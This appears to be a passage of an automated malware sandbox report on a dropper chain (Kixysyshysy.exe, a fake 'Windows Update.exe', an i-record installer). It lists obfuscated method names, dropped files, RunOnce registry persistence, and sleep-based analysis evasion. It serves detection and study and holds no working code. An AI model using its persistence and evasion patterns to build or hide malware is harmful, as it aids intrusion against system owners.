Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'

Persistence and Installation Behavior:

Drops executable to a common third party application directory
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File written: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\postproc-52.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-IGHFO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\1nJGU59JPU.exe File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe File created: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-T1381.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-9KFTG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-685QJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-CUGLT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-O4BO6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe File created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe File created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-3FQP6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-PVRDV.tmp
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe File created: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\swscale-2.dll (copy)
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe File created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\swresample-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\avcodec-53.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-ESLKL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\I-Record.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-QLPAO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-2J58U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\avformat-53.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\avutil-51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe File created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\idp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\Program Files (x86)\i-record\is-L76RD.tmp

Boot Survival:

Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-record.lnk
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus, 1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004241A4 IsIconic,SetActiveWindow, 1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_004843A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow, 1_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004175A8 IsIconic,GetCapture, 1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00417CDE IsIconic,SetWindowPos, 1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CE0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F128
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process information set: NOOPENFILEERRORBOX (42 identical entries)
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process information set: NOOPENFILEERRORBOX (43 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Process information set: NOOPENFILEERRORBOX (61 identical entries)
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process information set: NOOPENFILEERRORBOX (41 identical entries)
Source: C:\Program Files (x86)\i-record\I-Record.exe Process information set: NOOPENFILEERRORBOX (35 identical entries)
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 6980 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 5912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536 Thread sleep time: -8640000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536 Thread sleep time: -960000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe TID: 6956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 2832 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 6092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 5204 Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 7368 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 1360 Thread sleep time: -922337203685477s >= -30000s
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Evasive API call chain: GetSystemTime,DecisionNodes
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Thread delayed: delay time: 480000
